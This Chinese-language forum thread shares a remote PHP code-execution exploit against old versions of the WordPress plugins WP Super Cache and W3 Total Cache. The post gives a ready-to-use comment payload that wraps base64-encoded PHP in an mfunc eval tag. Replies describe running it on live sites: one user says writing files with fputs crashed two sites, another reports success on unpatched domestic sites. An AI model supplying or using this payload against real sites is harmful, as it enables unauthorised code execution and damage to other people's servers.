为什么没人发这个?Wordpress W3 Total Cache PHP Code Execution
针对以下两个插件都有效
WP Super Cache (version 1.2 and below, version 1.3.x and up are OK)
W3 Total Cache (version 0.9.2.8 and below, version 0.9.2.9 is OK)
在任意帖子处评论就执行了php,phpinfo();
WP Super Cache (version 1.2 and below, version 1.3.x and up are OK)
W3 Total Cache (version 0.9.2.8 and below, version 0.9.2.9 is OK)
在任意帖子处评论
<!--mfunc eval(base64_decode(cGhwaW5mbygpOyAg)); --><!--/mfunc-->
评论27次
WordPress 插件洞 可以的
fputs搞挂两个站,直接phoinfo没事,写post不知写在哪去了,没连上,郁闷,最终是写进哪个文件里的啊,看phpinfo的回显像是index.php里
终于遇到一个WP的
楼主发掘漏洞能力的确不错~
WP的爆的比较多的都是插件漏洞么?
这个主机商有提示
这个好啊。才知道
刚刚在那个论坛看到了
用这两个插件的人多么?
福利鉴定完毕
又是插件惹的祸.
wp的 好东西
人品果然好呀!
这个!在exploit-db上看过,还有个phpmyadmin的远程代码执行。
这个不错~收下福利了
收藏了,谢谢LZ····
应该不少牛的博客都用了这插件的
万恶的评论审核。
国内的好像很多都没升级, 昨天测试了一个 成功~
好东西啊,多谢分享